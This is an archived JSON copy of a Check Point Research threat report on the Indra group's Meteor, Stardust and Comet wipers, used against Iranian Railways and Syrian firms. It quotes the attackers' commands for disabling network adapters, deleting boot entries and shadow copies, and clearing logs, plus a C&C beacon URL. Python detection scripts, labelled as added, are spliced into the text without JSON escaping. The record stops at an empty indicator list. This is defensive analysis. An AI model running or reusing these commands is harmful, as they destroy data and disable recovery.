{
	"id": "afcddcd2-71e2-4a78-b085-fc54d4791bca",
	"created_at": "2026-04-06T00:18:59.599334Z",
	"updated_at": "2026-04-10T03:35:19.902393Z",
	"deleted_at": null,
	"sha1_hash": "6713bb014aef8caa0bbf5b439368d6bce119664d",
	"title": "Indra — Hackers Behind Recent Attacks on Iran - Check Point Research",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 212250,
	"plain_text": "Indra — Hackers Behind Recent Attacks on Iran - Check Point\r\nResearch\r\nBy itayc\r\nPublished: 2021-08-14 · Archived: 2026-04-05 15:04:59 UTC\r\nIntroduction\r\nThese days, when we think of nation-state level damage, we immediately think of the nation-state level actor that\r\nmust be responsible for it. While most attacks against a nation’s sensitive networks are indeed the work of other\r\ngovernments, the truth is that there is no magic shield that prevents a non-state sponsored entity from creating the\r\nsame kind of havoc, and harming critical infrastructure in order to make a statement.\r\nIn this piece, we present an analysis of a successful politically motivated attack on Iranian infrastructure that is\r\nsuspected to be carried by a non-state sponsored actor. This specific attack happened to be directed at Iran, but it\r\ncould as easily have happened in New York or Berlin. We’ll look at some of the technical details and expose the\r\nactor behind the attack — thereby linking it to several other politically motivated attacks from earlier years.\r\nKey Findings\r\nOn July 9th and 10th, 2021 Iranian Railways and the Ministry of Roads and Urban Development systems\r\nbecame the subject of targeted cyber attacks. Check Point Research investigated these attacks and found\r\nmultiple evidence that these attacks heavily rely on the attacker’s previous knowledge and reconnaissance\r\nof the targeted networks.\r\nThe attacks on Iran were found to be tactically and technically similar to previous activity against multiple\r\nprivate companies in Syria which was carried at least since 2019. We were able to tie this activity to a\r\nthreat group that identify themselves as regime opposition group, named Indra.\r\nDuring these years, the attackers developed and deployed within victims’ networks at least 3 different\r\nversions of the wiper dubbed Meteor, Stardust, and Comet. 
Judging by the quality of the tools, their modus operandi, and their presence on social media, we find it unlikely that Indra is operated by a nation-state actor.\r\nA technical analysis of the tools, as well as the TTPs used by the underlying actor, is thoroughly described in this article. We share with the public Yara rules and a full list of indicators of compromise.\r\nOn Friday, July 9th, Iran’s railway infrastructure came under cyber-attack. According to Iranian news reports, hackers displayed messages about train delays or cancellations on information boards at stations across the country, and urged passengers to call a certain phone number for further information. This number apparently belongs to the office of the country’s supreme leader, Ayatollah Ali Khamenei.\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 1 of 35\r\n“Long delays due to cyber attacks. More information: 64411” message containing the Supreme Leader office number displayed on Iran’s railways’ station boards. Image published by the media.\r\nThe very next day, July 10th, websites of Iran’s Ministry of Roads and Urbanization reportedly went out of service after another “cyber-disruption”. Iranian social media spread photos of the monitor of one of the hacked computers, where the attackers took responsibility for both consecutive attacks.\r\n“We attacked the computer systems of the Railway Company and the Ministry of Roads and Urban Development”. The message left by the attackers on hacked machines.\r\nA few days later, Iranian cybersecurity company Amnpardaz Software published a short technical analysis of a piece of malware supposedly related to these attacks, dubbed Trojan.Win32.BreakWin. 
Based on the information published, the Check Point Research team retrieved the files from publicly available resources and conducted a thorough investigation of them. The findings shared in this report were reviewed and evaluated by journalists and fellow researchers from other security vendors. During this time, SentinelOne released a report based on Amnpardaz’s analysis.\r\nIn this article, we first analyze the artifacts left by these attacks. Based on this analysis, we uncover a set of similar tools previously used in other operations during 2019-2020: carried out against multiple targets in Syria, they did not attract much public attention at the time. We then share some insights into the tactics, techniques, and procedures (TTPs) of the underlying actor, which self-identifies as “Indra” and, according to some Iranian sources, may have ties to hacktivist or cybercriminal groups.\r\nHunting for the files from the Iranian hack\r\nWith Amnpardaz’s threat database as our starting point, we searched for files with similar names and functionality. The search led us to dozens of files, all uploaded from the same two sources located in Iran. Even though we weren’t able to find all the mentioned artifacts, we recovered most of the execution flow as described in Amnpardaz’s report.\r\nThe execution flow is heavily based on multiple layers of archives and Batch scripts. When detonated, they:\r\nAttempt to evade anti-virus detection\r\nDestroy the boot configuration data\r\nRun the final payloads that aim to lock and completely wipe the computers in the network.\r\nThe execution flow of the attacks against targets in Iran\r\nThe execution starts with pushing a scheduled task from the AD to all the machines via group policy. 
The task name is Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeAll and it mimics the AnalyzeSystem task performed by the Windows Power Efficiency Diagnostics report tool. The subsequent chain of .bat files and archives is intended to perform the following operations:\r\nFilter the target machines: setup.bat first checks if the hostname of the machine is one of the following: PIS-APP, PIS-MOB, WSUSPROXY or PIS-DB. If so, it stops the execution and deletes the folder containing the malicious script from this machine. PIS in the hostnames stands for Passenger Information System, which is usually responsible, among other things, for updating the platform boards with live data, so the attackers made sure their message to the Iranian public would be displayed properly.\r\nDownload the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. 
The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment.\r\nExtract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat.\r\nDisconnect the machine from all networks: the cache.bat script disables all the network adapters on the machine with the following command: powershell -Command \"Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($_.NetEnabled) { $_.Disable() } }\" \u003e NUL\r\nPerform Anti-AV checks: the same cache.bat script also checks if Kaspersky Antivirus is installed on the machine and if not, it adds all the files and folders related to the attack to the Windows Defender exclusion list and proceeds with the execution.\r\nCorrupt the boot: bcd.bat is used in order to harm the boot process. First, it tries to overwrite the boot file with new content and then deletes the different boot identifiers using the Windows built-in BCDEdit tool: for /F \"tokens=2\" %%j in ('%comspec% /c \"bcdedit -v | findstr identifier\"') do bcdedit /delete %%j /f\r\nRemove the traces: the same bcd.bat, in addition to the boot overwrite, also removes the Security, System and Application Event Viewer logs from the system using wevtutil.\r\nUnleash the main payload: the msrun.bat script is responsible for unleashing the wiper. It moves the wiper-related files to C:\\temp and creates a scheduled task named mstask to execute the wiper only once, at 23:55:00.\r\nAnalysis of the main payload — The Wiper\r\nThe main payload of the attack is an executable named msapp.exe, and its purpose is to take the victim machine out of service by locking it and wiping its contents. 
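The batch-stage commands listed above, together with the shadow-copy deletion the wiper performs later (see Wiper functionality), are the most detectable part of this chain. The following script is an added example, not code from the Check Point report: it matches process-creation command lines (Sysmon event 1 or Security 4688 CommandLine fields) against those commands and flags hosts that exhibit several distinct stages, since any single stage (an administrator deleting a BCD entry, a backup job purging shadow copies) is too common to alert on by itself. The sample events are constructed, not logs from the incident; the assumption that msrun.bat registers its mstask task through schtasks.exe is ours and is marked in the code.

```python
"""Stage-chain detection for the batch tradecraft described above (added example)."""
import re
from collections import defaultdict

# (stage name, regex over the raw process command line). Patterns are loose about
# quoting, casing and paths so that trivial rewrites of the scripts still match.
STAGE_RULES = [
    # setup.bat: fetch env.cab from the domain's SYSVOL scripts share
    ("sysvol_cab_staging",
     re.compile(r"\\\\[^\\\s]+\\sysvol\\[^\\\s]+\\scripts\\[^\s\"]+\.cab", re.I)),
    # cache.bat: disable every network adapter through WMI
    ("adapter_disable",
     re.compile(r"Get-WmiObject.*Win32_NetworkAdapter.*\.Disable\(\)", re.I | re.S)),
    # bcd.bat: enumerate BCD identifiers, then delete each one
    ("bcd_enumerate",
     re.compile(r"bcdedit\s+-v\s*\|\s*findstr\s+identifier", re.I)),
    ("bcd_delete",
     re.compile(r"bcdedit(\.exe)?\s+[/-]delete\b", re.I)),
    # bcd.bat: clear the Security/System/Application logs
    ("eventlog_clear",
     re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\s+(Security|System|Application)\b", re.I)),
    # msapp.exe: shadow copy deletion after wiping
    ("shadow_delete",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    # msrun.bat creates a task named mstask; ASSUMPTION: it does so via schtasks.exe
    ("mstask_schedule",
     re.compile(r"schtasks(\.exe)?\s+/create\b.*/tn\s+\"?mstask\"?(\s|$)", re.I)),
]

# One stage alone is weak evidence; several distinct stages on one host is the signal.
CHAIN_THRESHOLD = 3


def classify_event(cmdline):
    """Names of the stages whose rule matches this command line (in rule order)."""
    return [name for name, rx in STAGE_RULES if rx.search(cmdline)]


def score_hosts(events):
    """events: iterable of (host, cmdline). Returns {host: sorted list of stages seen}."""
    seen = defaultdict(set)
    for host, cmdline in events:
        seen[host].update(classify_event(cmdline))
    return {host: sorted(stages) for host, stages in seen.items() if stages}


def flagged_hosts(events, threshold=CHAIN_THRESHOLD):
    """Hosts on which at least `threshold` distinct stages were observed."""
    return sorted(h for h, stages in score_hosts(events).items() if len(stages) >= threshold)


# Constructed sample records (hostname, command line); not logs from the incident.
SAMPLE_EVENTS = [
    ("WS-0417", r'cmd.exe /c copy "\\corp.example\sysvol\corp.example\scripts\env.cab" "C:\ProgramData\env.cab"'),
    ("WS-0417", r'powershell -Command "Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($_.NetEnabled) { $_.Disable() } }"'),
    ("WS-0417", r'C:\Windows\system32\cmd.exe /c "bcdedit -v | findstr identifier"'),
    ("WS-0417", r'bcdedit /delete {a1b2c3d4-0000-4000-8000-000000000001} /f'),
    ("WS-0417", r'wevtutil cl Security'),
    ("WS-0417", r'schtasks /create /tn mstask /tr C:\temp\msapp.exe /sc once /st 23:55'),
    ("SRV-BACKUP", r'vssadmin.exe delete shadows /all /quiet'),  # lone stage: backup housekeeping
    ("ADMIN-PC", r'bcdedit /delete {current} /f'),                # lone stage: admin cleanup
    ("ADMIN-PC", r'notepad.exe C:\Users\admin\notes.txt'),         # no stage
]

if __name__ == "__main__":
    for host, stages in sorted(score_hosts(SAMPLE_EVENTS).items()):
        print(host, stages)
    print("flagged:", flagged_hosts(SAMPLE_EVENTS))
```

Feed it exported command lines from your EDR or event forwarder; lower CHAIN_THRESHOLD to 2 in environments where Security-log clearing or bulk adapter disabling never happens legitimately, and add the Defender exclusion commands once you know which ones your telemetry records.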
Upon execution, msapp.exe hides its own console window to decrease the suspicion of vigilant victims.\r\nWiper configuration file\r\nThe wiper will refuse to function unless it is provided a path to an encrypted configuration file msconf.conf as a command-line argument. The configuration file allows some degree of flexibility during the execution of the payload and gives the attacker the ability to tailor the attack to specific victims and systems. A helper script to decrypt the configuration file is available in Appendix C.\r\nThe configuration format supports multiple fields, which jointly hint at this binary’s role in the attack.\r\nSupported Configuration Fields\r\nauto_logon_path\r\ncleanup_scheduled_task_name\r\ncleanup_script_path\r\nis_alive_loop_interval\r\nlocker_background_image_jpg_path\r\nlocker_background_image_bmp_path\r\nlocker_exe_path\r\nlocker_installer_path\r\nlocker_password_hash\r\nlocker_registry_settings_files\r\nlog_encryption_key\r\nlog_file_path\r\nlog_server_ip\r\nlog_server_port\r\npaths_to_wipe\r\nprocess_termination_timeout\r\nprocesses_to_kill\r\nself_scheduled_task_name\r\nstate_encryption_key\r\nstate_path\r\nusers_password\r\nwiping_stage_logger_interval\r\nNot all these fields were actually used in the configuration file of the wiper targeting the Iranian networks, which might suggest that the tool was not created specifically for this attack (or otherwise, that its design fell victim to premature optimization).\r\nIf the configuration is parsed successfully, the program writes the string \"Meteor has started.\" to an encrypted log file, suggesting that the internal name of the malware is “Meteor”. As we will see later on in this article, other names were used in previous attacks. Throughout the entire execution of the malware, it keeps logging its actions to this same encrypted log file. 
These detailed debug logs make it easier to analyze the malicious binary and understand its workflow. Appendix C contains a helper script to decrypt the log file.\r\nConfiguration steps\r\nThe malware next sets out to prevent the victim from stopping the ongoing infection. First, the machine is removed from the Active Directory domain using WinAPI or WMI. This makes it harder to remotely push any remediation tools to the infected machines. Next, the malware proceeds to corrupt the computer’s boot configuration: in versions of Windows prior to Windows 7, the malware overwrites the c:\\boot.ini file; in Windows 7 and above, it deletes the BCD entries. Finally, the malware changes the passwords of the local users. In the files analyzed, all the passwords chosen by the actor follow the same pattern, Aa153![random sequence], for example Aa153!rHrrdOvpCj or Aa153!IRro3d2JYm.\r\nWhen all the above is said and done, the user will not recover access to their machine easily. At this stage the malware disables the Windows screen saver, then changes both the desktop wallpaper and the lock screen image to a custom image. These are the pair of identical JPEG and BMP images presenting the logo of Iran’s Railways and a message similar to the one displayed on the platform boards of different railway stations in Iran:\r\n“Long delays due to cyber attacks. More information: 64411” message on the desktop wallpaper set up by the malware\r\nSomething about this “long delays due to cyber attacks” message just tickles our fancy, and betrays a somewhat surrealistic sense of humor on the attackers’ part. They could have written anything, but they chose that.\r\nWith the above done, the malware logs off all users and executes a small program — a “locker” — in a new thread. 
The path to the locker file, named mssetup.exe, is retrieved from the configuration. mssetup.exe prevents the user from interacting with the machine by blocking input from the keyboard and mouse devices.\r\nFinally, before moving to its main purpose — wiping the system — the malware creates a scheduled task that assures its own persistence in the system. The scheduled task will be executed every time the system starts.\r\nAs an aside, there is an extra step that didn’t take place in this specific attack: the malware is supposed to terminate all processes named in a processes_to_kill list specified in the configuration file. As it happens, the configurations used in the attacks against the Iranian targets did not contain this list, and so no processes were terminated. We will later show configuration files from previous attacks that did indeed use this feature.\r\nWiper functionality\r\nInternally, this part is called \"Prefix Suffix wiper\". As its name suggests, the malware gets a list of prefixes and suffixes from the configuration file and wipes the files that are matched by this rule. Another string in the malware — \"Middle Wiper\" — was probably used by this malware in the past in order to wipe files that contain some unique substrings.\r\nThe wiping procedure itself is pretty simple. First, the malware goes over the files and directories from the paths_to_wipe config, fills them with zero bytes instead of their real content, and then deletes them.\r\nAfter the wiping procedure, the malware tries to delete the shadow copies by running the following commands: vssadmin.exe delete shadows /all /quiet and C:\\Windows\\system32\\wbem\\wmic.exe shadowcopy delete. 
Finally, the malware enters an infinite loop where it sleeps based on the is_alive_loop_interval value from the configuration file and writes \"Meteor is still alive.\" to the log in every iteration.\r\nIf all this rings familiar to you, it should; it’s all straight out of the ransomware playbook — except this isn’t ransomware, which requires delicate orchestration of public-key and private-key cryptography to make the machine ultimately recoverable; this is Nuke-it-From-Orbit-ware. It’s a one-way trip.\r\nConnecting the files to the recent attacks against Iranian targets\r\nOur analysis of the files aligns with the analysis conducted by Amnpardaz. The flow of the attack is almost identical; the files have similar structure, the same names and the same functionality. With that said, there are still some differences. For example, the update.bat script that we analyzed is not used by the earlier variants, which instead execute nti.exe — an MBR infector based on the one used by NotPetya. Another example is a slight difference between the configuration shown in the Amnpardaz report and the configuration that we analyzed. The minor differences are in the paths_to_wipe key:\r\nWiper configuration file shared by Amnpardaz (on the left) and decrypted configuration file of the analyzed sample (sha256: 68e95a3ccde3ea22b8eb8adcf0ad53c7993b2ea5316948e31d9eadd11b5151d7)\r\nSome of the files we’ve found contain artifacts that tie them to the attack against Iran Railways. One of them is the image the attackers used when replacing the victim’s wallpaper and lock screen image. 
As we mentioned before, the text that is shown is identical to the text the attackers displayed at the train stations.\r\nTrain station board (on the left) shows the same message as the wallpaper installed by the malware (on the right)\r\nOther pieces in the files we analyzed contain names and other artifacts from Iran Railways’ internal network, including computer names and internal Active Directory object names. For example, the envxp.bat (67920ff26a18308084679186e18dcaa5f8af997c7036ba43c2e8c69ce24b9a1a) file delivered a payload using a shared directory under the \\\\railways.ir machine:\r\n@echo off\r\nSET dirPath=c:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Sounds\r\nSET cabRemotePath=\"\\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab\"\r\nSET cabLocalPath=\"%dirPath%\\env.cab\"\r\n...\r\nThis can suggest that the attackers had access to the system prior to unleashing the wiper. An article by the IRNA also mentions that experts who analyzed the attacks believe that they took place at least one month before being identified.\r\nAttacks Against Companies in Syria\r\nHunting for more files\r\nEquipped with the information gathered so far, we went for a hunt to find more samples. 
Specifically, we wanted to find out whether the attack on the Iranian targets was the first time that the attackers utilized these tools. Our queries quickly yielded results — files that were uploaded to VirusTotal by three different submitters located in Syria. The files seemed to belong to three separate incidents and were uploaded to VT in January, February and April 2020, more than a year before the recent attacks against the entities in Iran.\r\nThe main payloads (d71cc6337efb5cbbb400d57c8fdeb48d7af12a292fa87a55e8705d18b09f516e, 6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4, and 9b0f724459637cec5e9576c8332bca16abda6ac3fbbde6f7956bc3a97a423473) appear to be early versions of the Meteor wiper that was used against the targets in Iran. Similar to Meteor, they also contain multiple debug strings, which disclose the internal names of these versions of the wiper — Stardust and Comet. Of these two versions, Comet is the older one, compiled back in September 2019. While we have the complete execution flow of the two attacks that utilized Stardust, we only have a partial view of the one where Comet was used. For this reason, we will focus more on the execution chain of Stardust.\r\nUnlike the recent attacks, where Batch files were used during the early infection stages, these Stardust executions are based on multiple VBS scripts. What’s more, these scripts contain valuable information — the identities of the attacks’ targets.\r\nThe execution flow of the attacks against the Syrian companies.\r\nThe execution flows of both attacks leveled at Syria in which Stardust was deployed are very similar and thus will be described together. The initial payload that runs on the victim’s machine appears to be a VBS script, resolve.vbs, that extracts a password-protected RAR archive to the working folder C:\\Program Files\\Windows NT\\Accessories\\. 
This RAR contains another RAR file and three other VBS files. The resolve.vbs script then runs the extracted scripts in the following order:\r\n1. The first script iterates over the installed programs and checks if Kaspersky Antivirus is installed. If so, it tries to uninstall it using hardcoded domain credentials.\r\n2. The second script starts by checking if Kaspersky’s avp.exe process is running, and if so it tries to remove the Kaspersky license.\r\n3. The last script extracts the second-stage RAR archive and runs an executable file that the archive contains. This stage is the earlier mentioned Stardust variant of the wiper.\r\nDuring the execution of these scripts, several requests are made to a server in order to trace the different steps of the execution. These are GET requests to a URL with the following pattern, where the C\u0026C IP is different between the attacks:\r\nhttps://\u003cC\u0026C IP\u003e/progress.php?hn=\u0026dt=\u0026st=\u0026rs=\r\nwhere:\r\nhn = the Host Name\r\ndt = the Current Date and Time\r\nst = the Current Step\r\nrs = the Kaspersky AV running information\r\nEvolution of a Wiper\r\nThe wiper was the final payload used in all four incidents. The different names — Meteor, Stardust or Comet, depending on the version — weren’t the only difference between the variants. During the evolution of these 3 generations, the attackers introduced several changes in the tool, some more significant than others. Key changes between the different variants of the wiper are explained below.\r\nComet is the earliest variant we have, and it may well be the first to be created. 
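The progress.php beacons sent by the Stardust VBS stages described above leave a distinctive trail in web logs. The following script is an added example, not code from the Check Point report or from the Stardust scripts: it picks those GET requests out of a log, keyed on the path and the exact hn/dt/st/rs parameter set, and rebuilds each reporting host's step sequence and the servers it reported to, which gives an analyst the order in which machines were hit and whether Kaspersky was reported as running on each. It assumes the full URL is visible (a TLS-inspecting proxy, or script-side logging on the host); the log line format, the 203.0.113.7 server and the dt/st/rs values are constructed for the example, since the report does not give their formats.

```python
"""Reconstruct Stardust-style progress beacons from web logs (added example)."""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

BEACON_PATH = "/progress.php"
BEACON_PARAMS = {"hn", "dt", "st", "rs"}


def parse_beacon(url):
    """Return {'hn','dt','st','rs','dst'} when url has the beacon shape, else None.

    The check is on the exact parameter set, in any order, and tolerates empty
    values, so the literal pattern from the report (hn=&dt=&st=&rs=) also matches.
    """
    parts = urlsplit(url)
    if not parts.path.lower().endswith(BEACON_PATH):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if set(qs) != BEACON_PARAMS:
        return None
    rec = {k: qs[k][0] for k in BEACON_PARAMS}
    rec["dst"] = parts.hostname or ""
    return rec


def extract_beacons(log_lines):
    """log_lines: '<client> <method> <url> <status>' strings (constructed format)."""
    beacons = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 3 or fields[1].upper() != "GET":
            continue
        rec = parse_beacon(fields[2])
        if rec is not None:
            rec["client"] = fields[0]
            beacons.append(rec)
    return beacons


def trace_by_host(log_lines):
    """{hn: [(dt, st, rs), ...]} with each host's steps ordered by the dt the script sent."""
    traces = defaultdict(list)
    for b in extract_beacons(log_lines):
        traces[b["hn"]].append((b["dt"], b["st"], b["rs"]))
    return {hn: sorted(steps) for hn, steps in traces.items()}


def cnc_hosts(log_lines):
    """Distinct servers that received beacons, i.e. the C&C candidates to block and pivot on."""
    return sorted({b["dst"] for b in extract_beacons(log_lines)})


# Constructed sample log lines. The server is a documentation-range address and the
# dt/st/rs values are placeholders; the report does not specify their formats.
SAMPLE_LOG = [
    "10.1.2.30 GET https://203.0.113.7/progress.php?hn=FS01&dt=2020-02-11%2002%3A14%3A03&st=1&rs=running 200",
    "10.1.2.30 GET https://203.0.113.7/progress.php?hn=FS01&dt=2020-02-11%2002%3A14%3A09&st=2&rs=running 200",
    "10.1.2.30 GET https://203.0.113.7/progress.php?hn=FS01&dt=2020-02-11%2002%3A15%3A41&st=3&rs=not_running 200",
    "10.1.2.31 GET https://203.0.113.7/progress.php?st=1&rs=not_running&hn=WS07&dt=2020-02-11%2002%3A14%3A05 200",
    "10.1.2.31 GET https://203.0.113.7/progress.php?hn=WS07&dt=2020-02-11%2002%3A14%3A12&st=3&rs=not_running 200",
    "10.1.2.50 GET https://www.example.com/progress.php?hn=x 200",   # same file name, wrong parameter set
    "10.1.2.50 POST https://203.0.113.7/data.html 200",               # Stardust log upload, not a beacon
]

if __name__ == "__main__":
    for hn, steps in trace_by_host(SAMPLE_LOG).items():
        print(hn, steps)
    print("C&C:", cnc_hosts(SAMPLE_LOG))
```

A host whose trace jumps from step 1 to step 3 (WS07 in the sample) is worth a closer look: the second script is the one that tries to strip the Kaspersky license, and skipping it is consistent with no AV being present on that machine.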
Unlike Stardust and Meteor, Comet references and uses all the strings and features inside it; the later variants still contain the artifacts, but their code does not utilize them. Comet has a kill switch based on values from the config file, including the server IP, port, URL path, and a number of requests to perform before aborting. It tries to connect to the server and if it doesn’t get a response, or the response status is not 200 OK, it aborts. In addition, the oldest variant creates a user as an Administrator using the NetUserAdd and NetLocalGroupAddMembers APIs. Then it disables the first logon animation, as well as the first logon Privacy Settings screen. Finally, it adds itself to the auto logon based on a path it has in its configuration.\r\nUnlike Meteor, Stardust and Comet do not overwrite the boot.ini file during their attempts to corrupt the boot configuration. This feature, only relevant for Windows versions prior to Windows 7, only exists in the Meteor version. The earliest version, Comet, does not contain the ability to corrupt boot configurations at all.\r\n[boot loader]\r\ntimeout=0\r\ndefault=multi(0)disk(10000000)rdisk(0)partition(1000000)\\WINDOWS\r\n[operating systems]\r\nmulti(0)disk(10000000)rdisk(0)partition(1000000)\\WINDOWS=\"Microsoft Windows XP Professional\" /noexecute=optin /fastdetect\r\nThe content Meteor writes to boot.ini.\r\nStardust and Comet use “Lock My PC 4”, a tool that restricts unauthorized use and which used to be publicly available. After running the Lock My PC program, they remove the “hkSm” registry value to delete the generated lock password, then delete the uninstaller of the tool to make it harder to recover system functionality. This functionality is not used in Meteor, even though it has related artifacts.\r\nThe configuration files used in the attacks against the Syrian targets utilized more fields than the configurations that were used against the Iranian targets. These fields include processes_to_kill, paths_to_wipe, log_server_ip, and log_server_port. Their content sheds light on the targets of these operations and indicates that the attacker had access to the targeted networks prior to deploying the final attack.\r\nThe log_server_ip and log_server_port configuration fields are used by the Stardust wiper to send a Base64-encoded log file to the remote server. The request is sent via HTTP POST to the data.html resource on the server. The configs that we obtained contain different values for the servers, disclosing two IP addresses that were used by the attackers.\r\nWho are the targets?\r\nMultiple artifacts that were inspected during the analysis of these two Stardust operations in Syria point to the targeted companies — Katerji Group and its related company Arfada Petroleum — both located in Syria. First, the names of these companies appear in the VBS files as the parameters for the commands they executed to disable the Kaspersky AV. Another indication is the paths listed under the paths_to_wipe field in both configurations. These paths contain a list of user names, including the domain administrators of these two companies.\r\n\"paths_to_wipe\": [\r\n [...]\r\n \"c:\\\\Users\\\\administrator.ARFADA\\\\Desktop\",\r\n \"c:\\\\Users\\\\administrator.ARFADA\\\\Documents\",\r\n [...]\r\n\"paths_to_wipe\": [\r\n [...]\r\n \"c:\\\\Users\\\\administrator.KATERJIGROUP\\\\Desktop\",\r\n \"c:\\\\Users\\\\administrator.KATERJIGROUP\\\\Documents\",\r\n [...]\r\nMeet Indra\r\nOur scrutiny revealed not only the attacks’ targets, but also the identity of the group behind these operations — a group that calls itself “Indra” after the Hindu god of war. In fact, Indra did not try to hide that they are responsible for these operations, and left their signature in multiple places.\r\nThe image that was displayed by the attackers on the victims’ locked computers announces “I am Indra” and takes responsibility for the attacks on Katerji group.\r\nWallpaper set up by the Indra actor on victims’ machines, taking responsibility for the attacks and blaming the Katerji Group for “supporting terrorists” and “trading souls”\r\nIndra takes responsibility for the attack in which it deployed “Comet”.\r\nIn addition, all samples of the wiper but Meteor contain multiple occurrences of the string “INDRA”. It is used by the Comet variant as the username of a newly created Administrator account. 
In Stardust, though, it serves as an inert artifact and is not involved in execution.\r\nINDRA string inside the Stardust wiper\r\nWe wondered whether this Indra attack group has any online presence, and in fact, they do. They operate multiple social network accounts on different platforms, including Twitter, Facebook, Telegram, and YouTube. Among other information, the accounts contain the disclosure of the attacks on the aforementioned companies:\r\nIndra group Twitter account takes responsibility for the attacks on Arfada\r\nSurveying this social network activity, one can get an idea of the group’s political ideology and motive for the attacks, and even hear about some of the group’s previous operations.\r\nThe title of INDRA’s official Twitter account states that they are “aiming to bring a stop to the horrors of QF and its murderous proxies in the region” and they claim to be very focused on attacking different companies who allegedly cooperate with the Iranian regime, especially with the Quds Force and Hezbollah. Their posts are all written in English or Arabic (neither seems to be their native language), and most talk about opposing terror or offer document leaks from the various companies that fell victim to the group’s attacks due to suspected ties to the Iranian Quds Force.\r\nIn their first message, posted September 2019, INDRA claims to have carried out a successful attack against the company Alfadelex, demolished their network, and leaked the customers’ and employees’ data. One of the pictures posted by Indra from the hack against Alfadelex shows a webcam photo of a person sitting in front of a computer as they were watching the image we found used by Comet on their screen (one can only imagine how they felt at that moment). 
Another image, displayed on Alfadelex’s website, has the same background as the other images we found used in the attacks against Alfadelex, Katerji, and Arfada. This background image also appears as the cover photo of Indra’s Twitter and Facebook accounts.\r\nPrevious Indra Operations\r\nSumming up the social network activity of Indra, the actors claim to be responsible for the following attacks:\r\nSeptember 2019: an attack against Alfadelex Trading, a currency exchange and money transfer services company located in Syria.\r\nJanuary 2020: an attack against Cham Wings Airlines, a Syrian-based private airline company.\r\nFebruary 2020 and April 2020: seizure of Arfada’s and Katerji Group’s network infrastructure. Both companies are situated in Syria as well.\r\nNovember 2020: Indra threatens to attack the Syrian Banias Oil refinery, though it is not clear whether the threat was carried out.\r\nAround November 2020, all of Indra’s accounts fell silent. We weren’t able to find evidence of any additional operations until this latest one.\r\nConnecting Indra to the Attacks on Iranian Targets\r\nThe series of attacks on Syrian targets in 2019 and 2020 bears multiple similarities to the campaigns against the Iranian networks. 
These are similarities in the tools and in the Tactics, Techniques and Procedures (TTPs), as well as in the highly targeted nature of the attacks, and they make us believe that Indra is also responsible for the recent attacks in Iran.\r\nThe attacks are all directed against Iranian-related targets, whether it is Iran Railways and Iran’s Ministry of Roads in 2021, or Katerji, Arfada, Alfadelex, and other Syrian companies targeted in 2020 and 2019. Indra’s tweets and posts make it clear that they are targeting entities that they believe have ties with Iran.\r\nThe multi-layered execution flow in all the attacks we analyzed — including the recent attacks against Iranian targets — uses script files and archive files as the means of delivery. The scripts themselves, although of different file types, had almost the same functionality.\r\nThe execution flow relies on previous access and recon info about the targeted network. In the case of the Iranian intrusion, the attackers knew exactly which machines they needed to leave unaffected in order to deliver their message publicly; furthermore, they had access to the railway’s Active Directory server, which they used to distribute the malicious files. Another indication of the reconnaissance done by Indra is the screenshot they took from Alfadelex’s web camera, showing the office with an infected PC.\r\nThe wiper is the final payload deployed on the computers of the victims in all the aforementioned attacks. Meteor, Stardust, and Comet are different versions of the same payload, and we have no indication that this tool was ever used by other threat actors.\r\nThe actor behind the attacks we analyzed did not try to keep their attacks a secret. They shared messages and displayed pictures announcing the attacks. 
In the attacks against the Iranian targets, these messages were displayed not only on affected computers but also on the platform boards.\r\nUnlike their previous operations, Indra did not publicly take responsibility for the attacks in Iran. This might be explained by the seriousness of the new attacks, as well as their impact. While the attacks we inspected in Syria were carried out against private companies, the attacks against Iran Railways and the Ministry of Roads and Urbanization targeted official Iranian entities. Moreover, the attacks in Syria received little media attention, whereas the attacks against the Iranian government were covered extensively all over the world and reportedly caused the Iranians some amount of grief.\r\nConclusion\r\nBy carrying out an analysis of this latest attack against Iran, we were able to reveal its convoluted execution flow as well as 2 additional variants of the final ‘wiper’ component. These tools, in turn, were used previously in attacks against Syrian companies, for which the threat actor Indra officially took responsibility on their social media accounts. While Indra chose not to take responsibility for this latest attack against Iran, the similarities above betray the connection.\r\nThere are two lessons to be learned from this incident.\r\nFirst, anonymity is a one-way street. Once you sacrifice it to reap PR and obtain some sweet likes on Twitter, it is not so easily recovered. 
You can stop broadcasting your actions to the entire world and you might think that you’ve gone under the radar, but The Internet Remembers, and given enough motivation, it will deanonymize you, even if you’re a badass hacktivist threat actor.\r\nSecond, we should be more worried about attacks that are entirely possible but “clearly aren’t going to happen” according to the calculus of prevailing common wisdom. With all the trouble caused by cybercrime, hacktivism, nation-state meddling and so forth, the extent and sophistication of attacks in general are still a fraction of their full potential; oftentimes, threat actors don’t do X, Y, Z even though they perfectly well could, and we come to rely on this truancy as if it were a law of nature.\r\nCases like this, where said threat actors go ahead and do X, Y, Z, ought to raise our collective level of anxiety. As we said in the opening statement, this attack happened in Iran, but next month an equivalent attack could be launched by some other group targeting New York, and Berlin the month after that. 
Nothing prevents it, except threat actors’ limited patience, motivation and resources, which — as we’ve clearly just seen — are sometimes not so limited after all.\r\nAppendix A – Indicators of Compromise\r\nSamples:\r\n
